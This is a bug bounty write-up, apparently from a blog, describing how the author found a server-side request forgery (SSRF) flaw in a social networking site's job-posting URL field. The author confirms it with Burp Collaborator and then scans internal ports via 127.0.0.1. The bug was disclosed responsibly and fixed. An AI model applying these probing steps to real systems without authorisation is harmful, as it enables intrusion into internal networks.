Hello guys ,
This is Deepak Holani #appsec
This is my first write-up hope you like it ..
Deepak Holani (@w_hat_boy) | Twitter
The latest Tweets from Deepak Holani (@w_hat_boy). #appsec 🤗...#security
I was testing a private program
domain was in limited scope …it is related to social networking
I was looking for server side issue i see there box for adding url for job advertise first thing come in my mind try for SSRF here
SSRF Actions apply on different approches depend on where you are looking for ssrf
what are the some SSRF Actions >>
- Abuse the trust relationship between the vulnerable server and others.
- Bypass IP whitelisting.
- Bypass host-based authentication services.
- Read resources which are not accessible to the public.
- Scan the internal network to which the server is connected.
- Read files from the web server.
- View Status Pages and interact with APIs as the web server.
- Retrieve sensitive information such as the IP address of a web server behind a reverse proxy.
so as i said it was kind of social networking site
job posting url box below
so when i was testing for port scan on this bysimple localhost (127.0.0.1) and different port
but on web page it was not showing any error as we have cool friend burp
it was not showing me an port open or close
in addition to http:// I tried the other URL schema to read and make the server perform actions (file:///, dict://, ftp://, ldap:// and gopher://).
However, only http://
working so i open my burp
- I have two choice to check so first i check it with burp-collaborator you can read more about below link given and other by manual check by port ..
This section contains information about What Burp Collaborator is, How Burp Collaborator works, Security of data…
I check target >>> below is request and response
note: if you do not have VPS, … Collaborator everywhere in burp can help you testing…..
so it gave me idea that there is SSRF
so i decided to check port open or close
as https:// only allow
so i check first for port 443 >> 127.0.0.1:443
gave me 400 bad request …
now what i check on another port 22 >> 127.0.0.1:22
In this way i found many port open and close and scan all port which give
201 and 400 response …
Report details -
29-june-2018— Bug Reported to the company.
29-june-2018 — Bug triaged by team
29- june -2018—bug fixed
2-july-2018 — rewarded me cool bounty and
program launched on hackerone soon
Feel free to ask any question on this
Deepak Holani is on Facebook. Join Facebook to connect with Deepak Holani and others you may know. Facebook gives…